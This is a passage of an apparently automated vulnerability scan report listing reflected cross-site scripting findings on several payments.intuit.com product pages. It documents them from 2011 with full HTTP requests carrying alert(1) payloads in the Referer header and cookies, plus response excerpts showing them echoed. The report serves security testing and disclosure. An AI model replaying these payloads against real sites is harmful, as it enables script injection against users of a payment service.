Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=2f767'-alert(1)-'9675c472618

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=FKPARISn46qm1b8HC-sSUQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9616C710A0805192AA117E3B96D5DA6
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151809


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=2f767'-alert(1)-'9675c472618';
                   </script>
...[SNIP]...

1.26. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload de4d4--><script>alert(1)</script>82fdb4532f7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=de4d4--><script>alert(1)</script>82fdb4532f7

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:08 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=PyZhGH72PBrAq3Hf4qd1tg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:10 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96180120A0805192AA117E3C5484290
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=mobile_002dcredit_002dcard_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 151842


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=de4d4--><script>alert(1)</script>82fdb4532f7 | -->
...[SNIP]...

1.27. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9f96'-alert(1)-'b074d756760 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=e9f96'-alert(1)-'b074d756760

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:57 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=rnCR0HgxGDD5+iZ-tWA2Mw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:58 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9606A630A0805192AA117E378B5BFD1
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110754


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=e9f96'-alert(1)-'b074d756760';
                   </script>
...[SNIP]...

1.28. http://payments.intuit.com/products/basic-payment-solutions/quicken-merchant-services.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/quicken-merchant-services.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 89bfc--><script>alert(1)</script>439a0271950 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/quicken-merchant-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=89bfc--><script>alert(1)</script>439a0271950

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:13 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=0xNoB2tLCGWrVWeGSlYOGg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:14 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960A7C00A0805192AA117E36C190326
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quicken_002dmerchant_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 110789


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=89bfc--><script>alert(1)</script>439a0271950 | -->
...[SNIP]...

1.29. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13123'-alert(1)-'be5801a90fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=13123'-alert(1)-'be5801a90fa

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:23 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=v+hf0L3PiOVSnTMZkzeHEw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:24 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C3C7A0A0805192AA117E30A9ED903
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96465


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=13123'-alert(1)-'be5801a90fa';
                   </script>
...[SNIP]...

1.30. http://payments.intuit.com/products/check-processing-solutions/check-processing-solution.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/check-processing-solution.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d754d--><script>alert(1)</script>cf0ed983ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/check-processing-solution.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=d754d--><script>alert(1)</script>cf0ed983ea

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:39 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=wIeJmrvn-NaS8PtECoD4IQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:40 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C7A2C0A0805192AA117E362280873
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_002dsolution_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 96494


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=d754d--><script>alert(1)</script>cf0ed983ea | -->
...[SNIP]...

1.31. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac0d6'-alert(1)-'c1f71db423d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ac0d6'-alert(1)-'c1f71db423d

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=pD4WYGG-Cvv7karQOMmXBA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FDB4B0A0805192AA117E345F87602
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=online_002dcheck_002dservice_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 109428


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=ac0d6'-alert(1)-'c1f71db423d';
                   </script>
...[SNIP]...

1.32. http://payments.intuit.com/products/check-processing-solutions/online-check-service.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/check-processing-solutions/online-check-service.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3c927--><script>alert(1)</script>c31793869de was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/check-processing-solutions/online-check-service.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
